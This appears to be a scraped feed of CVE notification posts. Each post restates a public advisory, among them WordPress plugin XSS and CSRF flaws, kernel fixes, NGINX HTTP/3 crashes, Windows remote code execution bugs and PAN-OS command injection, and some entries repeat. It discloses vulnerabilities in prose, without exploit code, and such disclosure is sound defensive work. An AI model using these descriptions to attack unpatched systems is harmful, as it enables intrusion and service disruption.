🚨 CVE-2024-5223The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploading feature in all versions up to, and including, 4.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 13:37:33 |
🚨 CVE-2024-3269The Download Monitor plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on the dlm_uninstall_plugin function in all versions up to, and including, 4.9.13. This makes it possible for authenticated attackers to uninstall the plugin and delete its data.🎖@cveNotify |
|
| 2024-05-30 13:37:32 |
🚨 CVE-2024-3063The WPB Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the output of 'tags' added to widgets in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied tag attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 13:37:31 |
🚨 CVE-2024-5514MinMax CMS from MinMax Digital Technology contains a hidden administrator account with a fixed password that cannot be removed or disabled from the management interface. Remote attackers who obtain this account can bypass IP access control restrictions and log in to the backend system without being recorded in the system logs.🎖@cveNotify |
|
| 2024-05-30 13:37:27 |
🚨 CVE-2024-3726The Login Logout Register Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'llrmloginlogout' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 13:37:26 |
🚨 CVE-2024-36114Aircompressor is a library with ports of the Snappy, LZO, LZ4, and Zstandard compression algorithms to Java. All decompressor implementations of Aircompressor (LZ4, LZO, Snappy, Zstandard) can crash the JVM for certain input, and in some cases also leak the content of other memory of the Java process (which could contain sensitive information). When decompressing certain data, the decompressors try to access memory outside the bounds of the given byte arrays or byte buffers. Because Aircompressor uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM. Users should update to Aircompressor 0.27 or newer where these issues have been fixed. When decompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM, or to leak other sensitive information from the Java process. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-05-30 12:37:31 |
🚨 CVE-2024-5521Two Cross-Site Scripting vulnerabilities have been discovered in Alkacon's OpenCMS affecting version 16, which could allow a user having the roles of gallery editor or VFS resource manager will have the permission to upload images in the .svg format containing JavaScript code. The code will be executed the moment another user accesses the image.🎖@cveNotify |
|
| 2024-05-30 12:37:30 |
🚨 CVE-2024-5520Two Cross-Site Scripting vulnerabilities have been discovered in Alkacon's OpenCMS affecting version 16, which could allow a user with sufficient privileges to create and modify web pages through the admin panel, can execute malicious JavaScript code, after inserting code in the “title” field.🎖@cveNotify |
|
| 2024-05-30 12:37:26 |
🚨 CVE-2022-43841IBM Aspera Console 3.4.0 through 3.4.2 PL9 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 239078.🎖@cveNotify |
|
| 2024-05-30 12:37:25 |
🚨 CVE-2022-43384IBM Aspera Console 3.4.0 through 3.4.2 PL5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 238645.🎖@cveNotify |
|
| 2024-05-30 12:37:24 |
🚨 CVE-2024-1402Mattermost fails to check if a custom emoji reaction exists when sending it to a post and to limit the amount of custom emojis allowed to be added in a post, allowing an attacker sending a huge amount of non-existent custom emojis in a post to crash the mobile app of a user seeing the post and to crash the server due to overloading when clients attempt to retrive the aforementioned post.🎖@cveNotify |
|
| 2024-05-30 11:37:25 |
🚨 CVE-2024-5326The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.🎖@cveNotify |
|
| 2024-05-30 11:37:24 |
🚨 CVE-2024-3583The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 10:37:26 |
🚨 CVE-2024-4668The Gum Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Price Table and Post Slider widgets in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 10:37:25 |
🚨 CVE-2024-36014In the Linux kernel, the following vulnerability has been resolved:drm/arm/malidp: fix a possible null pointer dereferenceIn malidp_mw_connector_reset, new memory is allocated with kzalloc, butno check is performed. In order to prevent null pointer dereferencing,ensure that mw_state is checked before calling__drm_atomic_helper_connector_reset.🎖@cveNotify |
|
| 2024-05-30 10:37:24 |
🚨 CVE-2022-33324Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "29" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V Firmware versions "17" and prior, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW Firmware versions "07" and prior allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.🎖@cveNotify |
|
| 2024-05-30 09:37:30 |
🚨 CVE-2024-4427The Comparison Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.5. This makes it possible for authenticated attackers, with subscriber access or above, to change plugin settings and perform other actions such deleting sliders.🎖@cveNotify |
|
| 2024-05-30 09:37:26 |
🚨 CVE-2024-4422The Comparison Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slider title parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 09:37:25 |
🚨 CVE-2024-2657The Font Farsi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-05-30 09:37:24 |
🚨 CVE-2024-2089The Remote Content Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'remote_content' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 07:37:25 |
🚨 CVE-2024-5327The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the ‘pp_animated_gradient_bg_color’ parameter in all versions up to, and including, 2.7.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 07:37:24 |
🚨 CVE-2024-5073The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Twitter Feed component in all versions up to, and including, 5.9.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 06:37:26 |
🚨 CVE-2024-5341The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' attribute of the Heading Title widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 06:37:25 |
🚨 CVE-2024-36267Path traversal vulnerability exists in Redmine DMSF Plugin versions prior to 3.1.4. If this vulnerability is exploited, a logged-in user may obtain or delete arbitrary files on the server (within the privilege of the Redmine process).🎖@cveNotify |
|
| 2024-05-30 06:37:24 |
🚨 CVE-2024-27314Zoho ManageEngine ServiceDesk Plus versions below 14730, ServiceDesk Plus MSP below 14720 and SupportCenter Plus below 14720 are vulnerable to stored XSS in the Custom Actions menu on the request details. This vulnerability can be exploited only by the SDAdmin role users.🎖@cveNotify |
|
| 2024-05-30 05:37:30 |
🚨 CVE-2024-4218The AffiEasy plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.7. This is due to plugin improperly releasing the tagged and patched version of the plugin - the vulnerable version is used as the core files, while the patched version was included in a 'trunk' folder. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 05:37:26 |
🚨 CVE-2024-3947The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_settings() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 05:37:25 |
🚨 CVE-2024-3943The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_addcomment function. This makes it possible for unauthenticated attackers to add comments to to do items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-05-30 05:37:24 |
🚨 CVE-2024-3277The Yumpu ePaper publishing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handler function in all versions up to, and including, 2.0.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload PDF files and publish them, as well as modify the API key.🎖@cveNotify |
|
| 2024-05-30 04:37:26 |
🚨 CVE-2024-3269The Download Monitor plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on the dlm_uninstall_plugin function in all versions up to, and including, 4.9.13. This makes it possible for authenticated attackers to uninstall the plugin and delete its data.🎖@cveNotify |
|
| 2024-05-30 04:37:25 |
🚨 CVE-2024-3063The WPB Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the output of 'tags' added to widgets in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied tag attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 04:37:24 |
🚨 CVE-2024-2253The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URL values the plugin's carousel widgets in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 03:37:39 |
🚨 CVE-2024-5514MinMax CMS from MinMax Digital Technology contains a hidden administrator account with a fixed password that cannot be removed or disabled from the management interface. Remote attackers who obtain this account can bypass IP access control restrictions and log in to the backend system without being recorded in the system logs.🎖@cveNotify |
|
| 2024-05-30 03:37:38 |
🚨 CVE-2024-3726The Login Logout Register Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'llrmloginlogout' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-30 02:37:30 |
🚨 CVE-2024-4437The etcd package distributed with the Red Hat OpenStack platform has an incomplete fix for CVE-2021-44716. This issue occurs because the etcd package in the Red Hat OpenStack platform is using http://golang.org/x/net/http2 instead of the one provided by Red Hat Enterprise Linux versions, meaning it should be updated at compile time instead.🎖@cveNotify |
|
| 2024-05-30 02:37:29 |
🚨 CVE-2024-4436The etcd package distributed with the Red Hat OpenStack platform has an incomplete fix for CVE-2022-41723. This issue occurs because the etcd package in the Red Hat OpenStack platform is using http://golang.org/x/net/http2 instead of the one provided by Red Hat Enterprise Linux versions, meaning it should be updated at compile time instead.🎖@cveNotify |
|
| 2024-05-30 01:07:24 |
🚨 CVE-2024-4978Justice AV Solutions Viewer Setup 8.3.7.250-1 contains a malicious binary when executed and is signed with an unexpected authenticode signature. A remote, privileged threat actor may exploit this vulnerability to execute of unauthorized PowerShell commands.🎖@cveNotify |
|
| 2024-05-29 21:37:25 |
🚨 CVE-2024-36114Aircompressor is a library with ports of the Snappy, LZO, LZ4, and Zstandard compression algorithms to Java. All decompressor implementations of Aircompressor (LZ4, LZO, Snappy, Zstandard) can crash the JVM for certain input, and in some cases also leak the content of other memory of the Java process (which could contain sensitive information). When decompressing certain data, the decompressors try to access memory outside the bounds of the given byte arrays or byte buffers. Because Aircompressor uses the JDK class `sun.misc.Unsafe` to speed up memory access, no additional bounds checks are performed and this has similar security consequences as out-of-bounds access in C or C++, namely it can lead to non-deterministic behavior or crash the JVM. Users should update to Aircompressor 0.27 or newer where these issues have been fixed. When decompressing data from untrusted users, this can be exploited for a denial-of-service attack by crashing the JVM, or to leak other sensitive information from the Java process. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-05-29 21:37:24 |
🚨 CVE-2024-35221Rubygems.org is the Ruby community's gem hosting service. A Gem publisher can cause a Remote DoS when publishing a Gem. This is due to how Ruby reads the Manifest of Gem files when using Gem::Specification.from_yaml. from_yaml makes use of SafeYAML.load which allows YAML aliases inside the YAML-based metadata of a gem. YAML aliases allow for Denial of Service attacks with so-called `YAML-bombs` (comparable to Billion laughs attacks). This was patched. There is is no action required by users. This issue is also tracked as GHSL-2024-001 and was discovered by the GitHub security lab.🎖@cveNotify |
|
| 2024-05-29 20:37:26 |
🚨 CVE-2024-35492Cesanta Mongoose commit b316989 was discovered to contain a NULL pointer dereference via the scpy function at src/fmt.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MQTT packet.🎖@cveNotify |
|
| 2024-05-29 20:37:25 |
🚨 CVE-2021-22566An incorrect setting of UXN bits within mmu_flags_to_s1_pte_attr lead to privileged executable pages being mapped as executable from an unprivileged context. This can be leveraged by an attacker to bypass executability restrictions of kernel-mode pages from user-mode. An incorrect setting of PXN bits within mmu_flags_to_s1_pte_attr lead to unprivileged executable pages being mapped as executable from a privileged context. This can be leveraged by an attacker to bypass executability restrictions of user-mode pages from kernel-mode. Typically this allows a potential attacker to circumvent a mitigation, making exploitation of potential kernel-mode vulnerabilities easier. We recommend updating kernel beyond commit 7d731b4e9599088ac3073956933559da7bca6a00 and rebuilding.🎖@cveNotify |
|
| 2024-05-29 20:37:24 |
🚨 CVE-2021-22543An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation.🎖@cveNotify |
|
| 2024-05-29 20:07:38 |
🚨 CVE-2024-36016In the Linux kernel, the following vulnerability has been resolved:tty: n_gsm: fix possible out-of-bounds in gsm0_receive()Assuming the following:- side A configures the n_gsm in basic option mode- side B sends the header of a basic option mode frame with data length 1- side A switches to advanced option mode- side B sends 2 data bytes which exceeds gsm->len Reason: gsm->len is not used in advanced option mode.- side A switches to basic option mode- side B keeps sending until gsm0_receive() writes past gsm->buf Reason: Neither gsm->state nor gsm->len have been reset after reconfiguration.Fix this by changing gsm->count to gsm->len comparison from equal to lessthan. Also add upper limit checks against the constant MAX_MRU ingsm0_receive() and gsm1_receive() to harden against memory corruption ofgsm->len and gsm->mru.All other checks remain as we still need to limit the data according to theuser configuration and actual payload size.🎖@cveNotify |
|
| 2024-05-29 20:07:37 |
🚨 CVE-2024-35512An issue in hmq v1.5.5 allows attackers to cause a Denial of Service (DoS) via crafted requests.🎖@cveNotify |
|
| 2024-05-29 20:07:36 |
🚨 CVE-2024-36427The file-serving function in TARGIT Decision Suite 23.2.15007 allows authenticated attackers to read or write to server files via a crafted file request. This can allow code execution via a .xview file.🎖@cveNotify |
|
| 2024-05-29 20:07:32 |
🚨 CVE-2024-35333A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption.🎖@cveNotify |
|
| 2024-05-29 20:07:31 |
🚨 CVE-2024-35284A vulnerability in the legacy chat component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack due to insufficient input validation.🎖@cveNotify |
|
| 2024-05-29 20:07:30 |
🚨 CVE-2024-35200When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate.🎖@cveNotify |
|
| 2024-05-29 20:07:26 |
🚨 CVE-2024-32760When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 encoder instructions can cause NGINX worker processes to terminate or cause or other potential impact.🎖@cveNotify |
|
| 2024-05-29 20:07:25 |
🚨 CVE-2024-28974Dell Data Protection Advisor, version(s) 19.9, contain(s) an Inadequate Encryption Strength vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Denial of service.🎖@cveNotify |
|
| 2024-05-29 20:07:24 |
🚨 CVE-2023-46297An issue was discovered on Mercusys MW325R EU V3 MW325R(EU)_V3_1.11.0 221019 devices. A WAN attacker can make the admin interface unreachable/invisible via an unauthenticated HTTP request. Verification of the data sent by the user does not occur. The web server does not crash, but the admin interface becomes invisible, because the files necessary to display the content are no longer available. A reboot of the router is typically required to restore the correct behavior.🎖@cveNotify |
|
| 2024-05-29 19:37:25 |
🚨 CVE-2024-35434Irontec Sngrep v1.8.1 was discovered to contain a heap buffer overflow via the function rtp_check_packet at /sngrep/src/rtp.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SIP packet.🎖@cveNotify |
|
| 2024-05-29 19:37:24 |
🚨 CVE-2018-15574An issue was discovered in the license editor in Reprise License Manager (RLM) through 12.2BL2. It is a cross-site scripting vulnerability in the /goform/edit_lf_get_data lf parameter via GET or POST. NOTE: the vendor has stated "We do not consider this a vulnerability."🎖@cveNotify |
|
| 2024-05-29 18:37:25 |
🚨 CVE-2024-0570A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-29 18:37:24 |
🚨 CVE-2024-0569A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-29 17:37:44 |
🚨 CVE-2019-1145A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.There are multiple ways an attacker could exploit the vulnerability:In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability and then convince users to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email or instant message that takes users to the attacker's website, or by opening an attachment sent through email.In a file-sharing attack scenario, an attacker could provide a specially crafted document file designed to exploit the vulnerability and then convince users to open the document file.The security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.🎖@cveNotify |
|
| 2024-05-29 17:37:43 |
🚨 CVE-2019-1143An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a user’s system.There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.🎖@cveNotify |
|
| 2024-05-29 17:37:42 |
🚨 CVE-2019-1140A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how the Chakra scripting engine handles objects in memory.🎖@cveNotify |
|
| 2024-05-29 17:37:38 |
🚨 CVE-2019-1139A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how the Chakra scripting engine handles objects in memory.🎖@cveNotify |
|
| 2024-05-29 17:37:37 |
🚨 CVE-2019-1131A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge (HTML-based) and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how the Chakra scripting engine handles objects in memory.🎖@cveNotify |
|
| 2024-05-29 17:37:36 |
🚨 CVE-2019-1057A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input. An attacker who successfully exploited the vulnerability could run malicious code remotely to take control of the user’s system.To exploit the vulnerability, an attacker could host a specially crafted website designed to invoke MSXML through a web browser. However, an attacker would have no way to force a user to visit such a website. Instead, an attacker would typically have to convince a user to either click a link in an email message or instant message that would then take the user to the website. When Internet Explorer parses the XML content, an attacker could run malicious code remotely to take control of the user’s system.The update addresses the vulnerability by correcting how the MSXML parser processes user input.🎖@cveNotify |
|
| 2024-05-29 17:37:32 |
🚨 CVE-2019-0965A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.The security update addresses the vulnerability by correcting how Hyper-V validates guest operating system user input.🎖@cveNotify |
|
| 2024-05-29 17:37:31 |
🚨 CVE-2019-0723A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system. An attacker who successfully exploited the vulnerability could cause the host server to crash.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application that causes a host machine to crash.The update addresses the vulnerability by modifying how virtual machines access the Hyper-V Network Switch.🎖@cveNotify |
|
| 2024-05-29 17:37:30 |
🚨 CVE-2019-0720A remote code execution vulnerability exists when Windows Hyper-V Network Switch on a host server fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could run a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system.The security update addresses the vulnerability by correcting how Windows Hyper-V Network Switch validates guest operating system network traffic.🎖@cveNotify |
|
| 2024-05-29 17:37:27 |
🚨 CVE-2019-0718A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system. An attacker who successfully exploited the vulnerability could cause the host server to crash.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application that causes a host machine to crash.The update addresses the vulnerability by modifying how virtual machines access the Hyper-V Network Switch.🎖@cveNotify |
|
| 2024-05-29 17:37:26 |
🚨 CVE-2019-0716A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding.To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to cause a target system to stop responding.The update addresses the vulnerability by correcting how Windows handles objects in memory.🎖@cveNotify |
|
| 2024-05-29 17:37:25 |
🚨 CVE-2019-0714A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system. An attacker who successfully exploited the vulnerability could cause the host server to crash.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application that causes a host machine to crash.The update addresses the vulnerability by modifying how virtual machines access the Hyper-V Network Switch.🎖@cveNotify |
|
| 2024-05-29 16:37:43 |
🚨 CVE-2024-36427The file-serving function in TARGIT Decision Suite 23.2.15007 allows authenticated attackers to read or write to server files via a crafted file request. This can allow code execution via a .xview file.🎖@cveNotify |
|
| 2024-05-29 16:37:39 |
🚨 CVE-2024-35311Yubico YubiKey 5 Series before 5.7.0, Security Key Series before 5.7.0, YubiKey Bio Series before 5.6.4, and YubiKey 5 FIPS before 5.7.2 have Incorrect Access Control.🎖@cveNotify |
|
| 2024-05-29 16:37:38 |
🚨 CVE-2024-35283A vulnerability in the Ignite component of Mitel MiContact Center Business through 10.0.0.4 could allow an unauthenticated attacker to conduct a stored cross-site scripting (XSS) attack due to insufficient input validation.🎖@cveNotify |
|
| 2024-05-29 16:37:37 |
🚨 CVE-2024-35200When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate.🎖@cveNotify |
|
| 2024-05-29 16:37:33 |
🚨 CVE-2024-31079When NGINX Plus or NGINX OSS are configured to use the HTTP/3 QUIC module, undisclosed HTTP/3 requests can cause NGINX worker processes to terminate or cause other potential impact. This attack requires that a request be specifically timed during the connection draining process, which the attacker has no visibility and limited influence over.🎖@cveNotify |
|
| 2024-05-29 16:37:32 |
🚨 CVE-2023-46297An issue was discovered on Mercusys MW325R EU V3 MW325R(EU)_V3_1.11.0 221019 devices. A WAN attacker can make the admin interface unreachable/invisible via an unauthenticated HTTP request. Verification of the data sent by the user does not occur. The web server does not crash, but the admin interface becomes invisible, because the files necessary to display the content are no longer available. A reboot of the router is typically required to restore the correct behavior.🎖@cveNotify |
|
| 2024-05-29 16:07:32 |
🚨 CVE-2024-3400A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-05-29 15:37:58 |
🚨 CVE-2024-36373In JetBrains TeamCity before 2024.03.2 several stored XSS in untrusted builds settings were possible🎖@cveNotify |
|
| 2024-05-29 15:37:57 |
🚨 CVE-2024-36371In JetBrains TeamCity before 2023.05.5, 2023.11.5 stored XSS in Commit status publisher was possible🎖@cveNotify |
|
| 2024-05-29 15:37:56 |
🚨 CVE-2024-36369In JetBrains TeamCity before 2022.04.6, 2022.10.5, 2023.05.5, 2023.11.5 stored XSS via issue tracker integration was possible🎖@cveNotify |
|
| 2024-05-29 15:37:51 |
